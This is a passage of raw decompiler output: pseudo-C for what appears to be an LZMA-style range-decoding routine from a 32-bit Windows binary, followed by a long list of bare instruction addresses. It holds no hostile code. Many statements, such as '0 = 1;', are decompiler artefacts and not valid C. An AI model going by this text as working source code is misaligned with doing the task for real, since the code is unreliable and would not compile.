										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00407601
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406db1
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
